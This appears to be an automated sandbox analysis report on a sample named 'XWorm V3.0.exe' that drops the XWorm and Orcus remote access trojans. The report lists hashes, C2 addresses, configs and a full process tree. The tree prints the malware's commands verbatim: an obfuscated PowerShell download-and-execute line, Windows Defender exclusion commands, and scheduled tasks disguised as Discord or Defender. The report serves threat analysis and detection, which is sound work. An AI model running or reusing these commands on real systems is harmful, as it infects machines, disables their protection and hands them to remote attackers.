Analysis

  • max time kernel
    144s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    16-07-2024 01:03

General

  • Target

    XWorm V3.0.exe

  • Size

    19.3MB

  • MD5

    d7e85bc99cb79b98d64a6d4b8b7d041b

  • SHA1

    137f70c449be88103e4f1abfa80658ccbd9ba3f9

  • SHA256

    8dd83abb25a341413e009b4b6b0b12582382d99bc2f3d2b0d07c95bf3b8c0c81

  • SHA512

    c35a74526edee423254a4335946a9d447c95a31a4acb9923ee667d074f9c4f84d0d5f6cf22bc6a23012ebe04ef4d6ad43bd2e55dc287d4dfe52a5d9b71f8d4f1

  • SSDEEP

    393216:JZgqzDlLO/uc+9bPugF7cp4rTKiSVbafhkCvBeLfhfzm:JqctO/k9bPugypcKtVGhkckfBy

Malware Config

Extracted

Family

xworm

C2

147.185.221.18:43279

147.185.221.18:47186

147.185.221.18:45497

147.185.221.18:24123

147.185.221.18:41609

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Discord.exe

Extracted

Family

orcus

C2

147.185.221.18:43279

Mutex

1a3206b13a7141d7a10982ddf15a2503

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    false

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    AppData\OrcusWatchdog.exe

Signatures

  • Detect Xworm Payload 17 IoCs
  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus main payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Orcurs Rat Executable 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 9 IoCs
  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 2 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 6 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 3 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\XWorm V3.0.exe
    "C:\Users\Admin\AppData\Local\Temp\XWorm V3.0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\XWorm_V3.0.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProf"i"le -Executio"n"Policy B"y"pass -Window"S"tyle Hidden -Co"m"mand "Inv"o"ke-W"e"bRequest -Uri 'https://github.com/GoldHourse/OPTIMIZER/raw/main/XWorm_V3.0.exe' -Ou"t"File 'XWorm_V3.0.exe';" "Start-Process -FilePath 'XWorm_V3.0.exe'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2708
    • C:\Users\Admin\AppData\Roaming\XWorm V3.0.exe
      "C:\Users\Admin\AppData\Roaming\XWorm V3.0.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Users\Admin\AppData\Roaming\1.exe
        "C:\Users\Admin\AppData\Roaming\1.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2912
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\1.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:984
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:940
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:588
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\ProgramData\Discord.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1540
      • C:\Users\Admin\AppData\Roaming\2.exe
        "C:\Users\Admin\AppData\Roaming\2.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\2.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2948
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:396
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2968
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2996
      • C:\Users\Admin\AppData\Roaming\3.exe
        "C:\Users\Admin\AppData\Roaming\3.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2780
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\3.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2664
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '3.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:832
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\discord.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2040
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'discord.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1784
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "discord" /tr "C:\Users\Admin\AppData\Roaming\discord.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:568
      • C:\Users\Admin\AppData\Roaming\4.exe
        "C:\Users\Admin\AppData\Roaming\4.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\4.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2728
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '4.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2256
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Discord_Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2296
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord_Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2576
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord_Update" /tr "C:\Users\Admin\AppData\Roaming\Discord_Update.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1480
      • C:\Users\Admin\AppData\Roaming\5.exe
        "C:\Users\Admin\AppData\Roaming\5.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:864
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\5.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2788
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2216
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsDefender.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2680
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2352
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1296
      • C:\Users\Admin\AppData\Roaming\6.exe
        "C:\Users\Admin\AppData\Roaming\6.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:2596
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9smatpdu.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3020
          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES27EC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC27EB.tmp"
            5⤵
              PID:608
          • C:\Program Files\Orcus\Orcus.exe
            "C:\Program Files\Orcus\Orcus.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:276
        • C:\Users\Admin\AppData\Roaming\7.exe
          "C:\Users\Admin\AppData\Roaming\7.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2976
          • C:\Users\Admin\AppData\Roaming\7.exe
            "C:\Users\Admin\AppData\Roaming\7.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2480
    • C:\Windows\system32\conhost.exe
      \??\C:\Windows\system32\conhost.exe "108196391931600450721056642541075254560-183627000210658113384898043071169406501"
      1⤵
        PID:2976
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {C41B241E-874D-426D-B543-92B88FCF6476} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]
        1⤵
          PID:2928
          • C:\Users\Admin\AppData\Roaming\Discord_Update.exe
            C:\Users\Admin\AppData\Roaming\Discord_Update.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:3040
          • C:\Users\Admin\AppData\Roaming\discord.exe
            C:\Users\Admin\AppData\Roaming\discord.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1636
          • C:\Users\Admin\AppData\Roaming\WindowsDefender.exe
            C:\Users\Admin\AppData\Roaming\WindowsDefender.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1412
          • C:\Users\Admin\AppData\Roaming\svhost.exe
            C:\Users\Admin\AppData\Roaming\svhost.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2096
          • C:\Users\Admin\AppData\Roaming\Discord_Update.exe
            C:\Users\Admin\AppData\Roaming\Discord_Update.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2952
          • C:\Users\Admin\AppData\Roaming\discord.exe
            C:\Users\Admin\AppData\Roaming\discord.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2976
          • C:\Users\Admin\AppData\Roaming\WindowsDefender.exe
            C:\Users\Admin\AppData\Roaming\WindowsDefender.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1700
          • C:\Users\Admin\AppData\Roaming\svhost.exe
            C:\Users\Admin\AppData\Roaming\svhost.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2616

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Orcus\Orcus.exe.config

          Filesize

          357B

          MD5

          a2b76cea3a59fa9af5ea21ff68139c98

          SHA1

          35d76475e6a54c168f536e30206578babff58274

          SHA256

          f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

          SHA512

          b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

        • C:\Users\Admin\AppData\Local\Temp\9smatpdu.dll

          Filesize

          76KB

          MD5

          f06a94a34022abd760b14c7f9712edf3

          SHA1

          736b33bcaac66b9de20abc73913583052b247a1d

          SHA256

          670d45bff8bb640d0d0945c42630cd5a385477c1d0b02789f328bbca71df793b

          SHA512

          6539282dcd9d54509c4967d5e0ec05cce0f32c9921ffae50d314f0e0c4e006e5a6efd30e30146a54405dfe1088aee8c6a0d39febc4796dc8639c1eaf6184d856

        • C:\Users\Admin\AppData\Local\Temp\RES27EC.tmp

          Filesize

          1KB

          MD5

          3f567e100b2e5a14bdc295b9d0b2aa87

          SHA1

          7aa71b21920187bc186d13dee800a67b988cbbe4

          SHA256

          07c79cb173f955df36e220279145c43f27c3ec70c50b551f198b429d62f13673

          SHA512

          64fd7de9b06af5650c349b249bbb3a4d7edf28f4d898bcb1eba976abcc191adb390261ebd6f831e64e1821333daeb94016785c2164f86f30b8be77ec4b1181dc

        • C:\Users\Admin\AppData\Roaming\1.exe

          Filesize

          78KB

          MD5

          96de307a20d164e286dc6f9d576243ac

          SHA1

          a04ea83541d793242a8ac298193228b180b45ac9

          SHA256

          ccf5c48559a9010f280a669e104e0a7158c8f0f11326064687e7c04fcbc1b282

          SHA512

          3a8c7db311a078b15bf5e486f04d42f22fb2d2430339e5fbe94543c8e39eb8829eee2befbcf89b93c0db24fd46c1bda1190bf122a0476a1dc00854bc02c2864c

        • C:\Users\Admin\AppData\Roaming\2.exe

          Filesize

          61KB

          MD5

          f9c401f094879541dc43fe2e1be6598b

          SHA1

          4164f2b5b0d538b31a6bd98943bdb4f00950c5b8

          SHA256

          93c8db705f405b9145677f69b4a396369c39a04cf87502ea94ac56e373267aac

          SHA512

          a70d9be58c7b873a7b91054e3290a23bba0e47a207494d84a0dffbbe310c5791fe1038e506d183d891fd3a39b0dd1a55869b751a735fa9923fe9ae4ab8c52909

        • C:\Users\Admin\AppData\Roaming\3.exe

          Filesize

          98KB

          MD5

          22f92d02b03f4c7027e27b8e9dc8c5a9

          SHA1

          1d0df57ce658e213ff66b3e619620e4b2b312cb6

          SHA256

          3134b8ccd158b31c28d489023ea9d62691d563f9b9dd107e8e64dda6088a6199

          SHA512

          dc0a52a1fdc61b5c82cb1886a7e67a7b7d6fc309fe7e75fcc2588b6891902fb52271521a432a59a2e9bc93e6df82b5a4fb1d5a5715de808808734099985f3750

        • C:\Users\Admin\AppData\Roaming\4.exe

          Filesize

          171KB

          MD5

          3d5ea2f503c390dd7285b72915dc366f

          SHA1

          f62b85a917d7f98469c040af63132d5aee7a375b

          SHA256

          017471b298fac8758de30a3ced121531a75a67670bc2e7d581c56606b6a337f1

          SHA512

          d005b12a9e18edc333af4b839ca4f611946df130685035a4c6eeb9f3c3f880ce13654f33c909d02a232045c9628e6df0626cd14b9e87327ba57591dee9bb98c9

        • C:\Users\Admin\AppData\Roaming\5.exe

          Filesize

          72KB

          MD5

          1f7c0615295d2c2c80a34738617a62dd

          SHA1

          846329a7fc0f9aca346909decf282244cb6701e0

          SHA256

          11e622baa1481b2cc65c69b2cd93fa62e884dc33a680f907f6b079c735b790fe

          SHA512

          827d639f43524ca216fdec489c04c6a1fb01c3f1e6873b17eb61e018f0317a395bb64a242915b89696a3487990cf854420dba130e94e430e180cb316d71c4244

        • C:\Users\Admin\AppData\Roaming\6.exe

          Filesize

          903KB

          MD5

          065d393fc49f68ddb101aec6b97bee49

          SHA1

          c3844c19b60ea39eade055660a3dd3934e0a2d96

          SHA256

          125634fb6ef6029bad99024cd4c8f0838cb086d4f071200b56bd58eec6e74127

          SHA512

          1f72124b73f7670db5c21ca23d0835731c0001471551e17cc19a4c356db3a03a43eaf07df2b2a67ff2f438e3aa6b1dd01bbb937600b75033d7381339e8f0474e

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          881135dd2a0378d3fc1c00d5ac23fd9d

          SHA1

          83b781e8571e84998b0d7937eeb7a8923a1fdee7

          SHA256

          6e32be05a21ed780ae2bb4e86c2ae4a10b8fbd3021920eeb2b0b434bfb822bb7

          SHA512

          b245c3870d890fe5fc8814a38e7c29432ace397cf4a4d569c1daaad8e8821c514497c243add91db56e40bab810f4cc4470697998512a657f6fcce482caec6724

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk

          Filesize

          633B

          MD5

          ebe35d6819eeaccef40578d2e5b51263

          SHA1

          45dc56fff59a1a5d8f3131eec627c2c17cf8bfbb

          SHA256

          8f829ff745d96375b8d8b64097fee3fe477ea18ede3f3abc549986ce27b81e6c

          SHA512

          b1ab95dafca33fdbd2f0718046026a6314f512177a3dd39bba9fa5742a1cb29d200e0cb8c2f8382bcabf896af64f6c1e6c06ee736015c85bb7031b948804e250

        • C:\Users\Admin\AppData\Roaming\XWorm V3.0.exe

          Filesize

          19.2MB

          MD5

          1b10ac7f9574310ec8d3f4816c2832d9

          SHA1

          daba65e48b4f8b2c1b61b6cf91fc6e2f36fe1892

          SHA256

          4990c4e127c5ce86306dc3774862034cdc54a7b5c31fb536179faacf4adbd8b8

          SHA512

          f5123ece8328e4ca2340deecf3386e0b3b926ec2be94625970b1f2ed1f04d81effb2bddeeafdf47fc2266d2e9d823a0a6aa431eb0287c76df933194b9de02270

        • C:\Users\Admin\AppData\Roaming\XWorm_V3.0.bat

          Filesize

          456B

          MD5

          3a027298558ab19b65d90b9f560f6df2

          SHA1

          816938f082f384e2d8c750bc08deea4f13bd4b8c

          SHA256

          66b54aca4d5098b2491173976f050b7bb44baa98e1fe522f8ba12f4caa0a2a15

          SHA512

          dc78cb3f9654ea27066b74fe0a83b2158508c1f6931f71b9f36edc21a263bd51afda73ea2879c20510e637b824b848549a8af544d86fee22056c5328d1ca9429

        • \??\PIPE\srvsvc

          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \??\c:\Users\Admin\AppData\Local\Temp\9smatpdu.0.cs

          Filesize

          208KB

          MD5

          2b14ae8b54d216abf4d228493ceca44a

          SHA1

          d134351498e4273e9d6391153e35416bc743adef

          SHA256

          4e1cc3da1f7bf92773aae6cffa6d61bfc3e25aead3ad947f6215f93a053f346c

          SHA512

          5761b605add10ae3ef80f3b8706c8241b4e8abe4ac3ce36b7be8a97d08b08da5a72fedd5e976b3c9e1c463613a943ebb5d323e6a075ef6c7c3b1abdc0d53ac05

        • \??\c:\Users\Admin\AppData\Local\Temp\9smatpdu.cmdline

          Filesize

          349B

          MD5

          56334685c817f5ee77414eae74b33882

          SHA1

          bd099b564a7198036b2748c0606730215ba509e7

          SHA256

          7e6c42151298dbe7360bf31a3a61dcc44f9cd775d335803e0a15857da32435af

          SHA512

          76eda4a7ef17daf583d9d96c1ecee7de71b04de3aa03ef526a70c798404d13b07ecb1c38129d0531aea2728b97914b20049252f0b8fe465ff9066f1c82c18a6c

        • \??\c:\Users\Admin\AppData\Local\Temp\CSC27EB.tmp

          Filesize

          676B

          MD5

          2289bb0eeacea620909b0e7970a7fe7e

          SHA1

          65533a5391eb46ab05e58b2c9193cb27606cf7a2

          SHA256

          b0fba38ecbd5c35a1dec53353da042a70caea9221a58a1239c8d60b6f01878c8

          SHA512

          41050641949471591b748ffaaa7a8cec336b42c32b1b9ac7c1a8b7ce8ed3e80ae2f555d72ed44a33b8aecc82d694dd0395058bc4d3960beb1568aa92cd55fa96

        • \Users\Admin\AppData\Local\Temp\_MEI29762\python310.dll

          Filesize

          1.4MB

          MD5

          69d4f13fbaeee9b551c2d9a4a94d4458

          SHA1

          69540d8dfc0ee299a7ff6585018c7db0662aa629

          SHA256

          801317463bd116e603878c7c106093ba7db2bece11e691793e93065223fc7046

          SHA512

          8e632f141daf44bc470f8ee677c6f0fdcbcacbfce1472d928576bf7b9f91d6b76639d18e386d5e1c97e538a8fe19dd2d22ea47ae1acf138a0925e3c6dd156378

        • \Users\Admin\AppData\Roaming\7.exe

          Filesize

          17.7MB

          MD5

          dacf5de38fc04e84539fbb83324e6718

          SHA1

          b9a64a1e06dda01619b53bbee67e0b0c0278b589

          SHA256

          c8ba652f285cbf4e5af985b5a001cec86afa916236f930500d6ea7c206a1620e

          SHA512

          4d42b6d8196f8f8d0f38f9935ad05cd439b7f0a3f5b97dbb914bc083f6e78a9a748647545989b98e7c6df2293de50ce09afdec1e4a03a1a6d70aa778f1180626

        • memory/276-249-0x0000000000280000-0x0000000000290000-memory.dmp

          Filesize

          64KB

        • memory/276-210-0x0000000000420000-0x0000000000438000-memory.dmp

          Filesize

          96KB

        • memory/276-208-0x0000000002110000-0x000000000215E000-memory.dmp

          Filesize

          312KB

        • memory/276-207-0x0000000000290000-0x00000000002A2000-memory.dmp

          Filesize

          72KB

        • memory/276-205-0x0000000000BC0000-0x0000000000CA8000-memory.dmp

          Filesize

          928KB

        • memory/864-58-0x0000000000A30000-0x0000000000A48000-memory.dmp

          Filesize

          96KB

        • memory/1412-459-0x00000000000F0000-0x0000000000108000-memory.dmp

          Filesize

          96KB

        • memory/1636-461-0x0000000001170000-0x000000000118E000-memory.dmp

          Filesize

          120KB

        • memory/1700-467-0x0000000000900000-0x0000000000918000-memory.dmp

          Filesize

          96KB

        • memory/2064-1-0x00000000013B0000-0x0000000002700000-memory.dmp

          Filesize

          19.3MB

        • memory/2064-0-0x000007FEF5583000-0x000007FEF5584000-memory.dmp

          Filesize

          4KB

        • memory/2096-460-0x0000000000860000-0x0000000000876000-memory.dmp

          Filesize

          88KB

        • memory/2480-195-0x000007FEEAEE0000-0x000007FEEB34E000-memory.dmp

          Filesize

          4.4MB

        • memory/2596-196-0x0000000000420000-0x0000000000432000-memory.dmp

          Filesize

          72KB

        • memory/2596-192-0x000000001ADF0000-0x000000001AE06000-memory.dmp

          Filesize

          88KB

        • memory/2596-59-0x000000001AD90000-0x000000001ADEC000-memory.dmp

          Filesize

          368KB

        • memory/2596-60-0x0000000000380000-0x000000000038E000-memory.dmp

          Filesize

          56KB

        • memory/2616-469-0x00000000011C0000-0x00000000011D6000-memory.dmp

          Filesize

          88KB

        • memory/2628-50-0x0000000000EE0000-0x0000000000F10000-memory.dmp

          Filesize

          192KB

        • memory/2708-17-0x00000000025A0000-0x00000000025A8000-memory.dmp

          Filesize

          32KB

